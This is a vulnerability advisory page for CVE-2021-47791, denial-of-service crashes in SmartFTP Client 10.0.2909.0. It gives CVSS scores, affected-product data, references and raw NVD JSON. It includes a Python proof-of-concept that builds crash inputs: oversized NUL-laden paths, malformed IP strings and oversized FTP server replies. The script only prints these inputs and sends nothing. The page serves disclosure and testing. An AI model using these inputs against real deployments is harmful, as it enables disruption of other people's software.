Security Vulnerability Report
CVE-2021-47791 CVSS 7.5 HIGH

CVE-2021-47791

Published: 2026-01-16 00:16:23
Last Modified: 2026-01-30 00:59:00

Description

SmartFTP Client 10.0.2909.0 contains multiple denial of service vulnerabilities that allow attackers to crash the application through specific input manipulation. Attackers can trigger crashes by entering malformed paths, using invalid IP addresses, or clearing connection history in the client's interface.

CVSS Details

CVSS Score
7.5
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
(The raw record below also carries a CVSS 4.0 vector, AV:L/AC:L/AT:N/PR:N/UI:A/VA:L, scored 4.6 MEDIUM; its local-access, user-interaction profile matches the description, which says the crashes are triggered through the client's own interface.)

Configurations (Affected Products)

cpe:2.3:a:smartftp:smartftp:10.0.2909.0:*:*:*:*:*:*:* - VULNERABLE
SmartFTP Client 10.0.2909.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2021-47791 PoC - SmartFTP Client DoS
# Builds the crash-triggering inputs described for SmartFTP Client 10.0.2909.0.
# It constructs and prints them; it does not drive the client or the network.
import socket
import struct
import time


class SmartFTPDoS:
    """Build and print the inputs the advisory associates with client crashes.

    CVE-2021-47791 describes crashes triggered by malformed paths, invalid IP
    addresses and clearing the connection history in the SmartFTP Client UI.
    Nothing in this class sends traffic or automates the client: each
    ``crash_via_*`` method only constructs the candidate input, prints it and
    returns it for a human tester to apply by hand. ``socket`` and ``struct``
    are imported but never used anywhere in this module.
    """

    def __init__(self, target_ip, target_port=21):
        # Kept for reference only; no method below opens a connection.
        self.target_ip = target_ip
        self.target_port = target_port

    def crash_via_malformed_path(self):
        """Return the oversized, NUL-containing path value (vector 1).

        Returns:
            bytes: 5000 ``A`` bytes, one NUL, then 100 repetitions of two
            dots followed by a NUL (5301 bytes in total). The length is
            printed for the operator; nothing is sent.
        """
        print("[*] Testing malformed path vector...")
        crafted_path = b"".join([b"A" * 5000, b"\x00", b"..\x00" * 100])
        print(f"[!] Malformed path payload length: {len(crafted_path)}")
        print("[+] Payload crafted - enter this in SmartFTP path input")
        return crafted_path

    def crash_via_invalid_ip(self):
        """Return the list of malformed host strings (vector 2).

        Each entry is printed with ``repr`` so embedded NUL / newline
        characters stay visible. The list is returned unchanged so a caller
        can feed the values into the connection dialog one at a time.
        """
        print("[*] Testing invalid IP address vector...")
        # Out-of-range octets, embedded control characters, an overlong label
        # and the empty string: address-parsing edge cases, in the page's order.
        candidate_hosts = [
            "999.999.999.999",
            "192.168.1.1\x00",
            "a" * 100 + ".168.1.1",
            "192.168.1.1\n",
            "",
        ]
        for host in candidate_hosts:
            print(f"[!] Testing IP: {host!r}")
        print("[+] Invalid IP payloads crafted")
        return candidate_hosts

    def crash_via_clear_history(self):
        """Print 100 numbered "clear" steps with a 10 ms pause between them (vector 3).

        This is a timing stand-in, not an automation of the client: it does
        not interact with SmartFTP at all and takes roughly one second.
        Always returns True.
        """
        print("[*] Testing clear history vector...")
        for step in range(1, 101):
            print(f"[*] Clear operation {step}/100")
            time.sleep(0.01)
        print("[+] Rapid clear operations completed")
        return True

    def generate_ftp_server_response(self):
        """Return four oversized FTP reply lines for a test server to echo.

        Returns:
            list[bytes]: a 220 banner padded with 10000 ``A`` bytes, a 230
            reply padded with 5000 NULs, a 150 reply padded with 5000 ``..``
            pairs, and a 227 reply whose first address field is 1000 digits
            long. Every line ends in CRLF. Nothing is transmitted here.
        """
        print("[*] Generating malicious FTP responses...")
        crlf = b"\r\n"
        pasv_body = b"(" + b"9" * 1000 + b",9,9,9,9,9)"
        return [
            b"220 " + b"A" * 10000 + crlf,
            b"230 " + b"\x00" * 5000 + crlf,
            b"150 " + b".." * 5000 + crlf,
            b"227 " + pasv_body + crlf,
        ]


def main():
    """Interactive menu: read a host from stdin, then run one vector by number."""
    banner = "=" * 60
    print(banner)
    print("CVE-2021-47791 SmartFTP Client DoS PoC")
    print("Target: SmartFTP Client 10.0.2909.0")
    print("CVSS: 7.5 (High)")
    print(banner)
    target_ip = input("Enter target IP (or press Enter for localhost): ") or "127.0.0.1"
    dos = SmartFTPDoS(target_ip)
    print("\n[*] Available attack vectors:")
    print("1. Malformed Path Input")
    print("2. Invalid IP Address")
    print("3. Clear Connection History (Race Condition)")
    print("4. Malicious FTP Server Responses")
    # Menu number -> bound method; any other input falls through to the error line.
    vectors = {
        "1": dos.crash_via_malformed_path,
        "2": dos.crash_via_invalid_ip,
        "3": dos.crash_via_clear_history,
        "4": dos.generate_ftp_server_response,
    }
    choice = input("\nSelect attack vector (1-4): ")
    selected = vectors.get(choice)
    if selected is None:
        print("[-] Invalid choice")
    else:
        selected()
    print("\n[*] PoC execution completed")
    print("[!] Note: This is for educational/testing purposes only")


if __name__ == "__main__":
    main()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2021-47791", "sourceIdentifier": "[email protected]", "published": "2026-01-16T00:16:22.827", "lastModified": "2026-01-30T00:59:00.067", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "SmartFTP Client 10.0.2909.0 contains multiple denial of service vulnerabilities that allow attackers to crash the application through specific input manipulation. Attackers can trigger crashes by entering malformed paths, using invalid IP addresses, or clearing connection history in the client's interface."}, {"lang": "es", "value": "SmartFTP Cliente 10.0.2909.0 contiene múltiples vulnerabilidades de denegación de servicio que permiten a los atacantes bloquear la aplicación mediante la manipulación específica de entradas. Los atacantes pueden provocar bloqueos al introducir rutas malformadas, usar direcciones IP no válidas o borrar el historial de conexiones en la interfaz del cliente."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:A/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 4.6, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "ACTIVE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": 
"NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-770"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:smartftp:smartftp:10.0.2909.0:*:*:*:*:*:*:*", "matchCriteriaId": "07843FD2-CFDD-4E7D-A348-5E1A8CE1FBD3"}]}]}], "references": [{"url": "https://www.exploit-db.com/exploits/50266", "source": "[email protected]", "tags": ["Exploit"]}, {"url": "https://www.smartftp.com/en-us/", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://www.smartftp.com/en-us/download", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://www.vulncheck.com/advisories/smartftp-client-multiple-denial-of-service", "source": "[email protected]", "tags": ["Third Party Advisory"]}, {"url": "https://www.exploit-db.com/exploits/50266", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit"]}]}}